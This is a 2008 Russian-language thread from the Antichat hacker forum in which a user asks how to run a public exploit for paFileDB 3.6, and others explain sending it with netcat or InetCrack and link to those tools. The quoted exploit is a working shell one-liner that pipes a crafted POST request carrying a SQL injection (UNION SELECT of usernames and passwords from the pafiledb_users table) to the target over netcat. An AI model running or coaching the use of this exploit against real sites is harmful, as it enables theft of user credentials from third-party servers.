Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   помогите с эксплойтом (https://forum.antichat.xyz/showthread.php?t=96361)

geforse 14.12.2008 14:32
помогите с эксплойтом
 
на милворме есть сплойт для paFileDB 3.6
Я не пойму как с ним работать( вот это что за код ? o_0
На чём написан ? Может нужно сохранить как .bat и запустить ?

Код:
host="www.example.com"; echo -e "POST
http://$host/index.php?act=search&process HTTP/1.1\nHost: $host\nContent-Length:
302\n\nquery=test&search_in[]=file_name&  search_in[]=file_desc&search_in[]=file_longdesc&search_in[]=file_creator&search_in[]=file_version&categories[]=1)
UNION SELECT ALL null,user_username,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM (pafiledb_users"| netcat $host 80

iddqd 14.12.2008 14:44
попробуй отправить это как header с помощью inetcrack

+BemepoK+ 20.12.2008 01:57
Эксплоит шлёт пакет при помощи утилиты netcat с линуксовой тачки. Существует версия netcat для Win32, поэтому всё то же самое (с небольшими отличиями) можно повторить и под Windows.

Линуксовый netcat льём с официального сайта:

http://netcat.sourceforge.net/download.php

Виндовый отсюда:

http://jesterpm.net/downloads.php

censored! 16.01.2009 12:40
InetCrack-ом можно.
...
p.s. Что-то на Ачате он не доступен, если что, вот: http://uploadbox.com/ru/files/85abce0206


Время: 00:55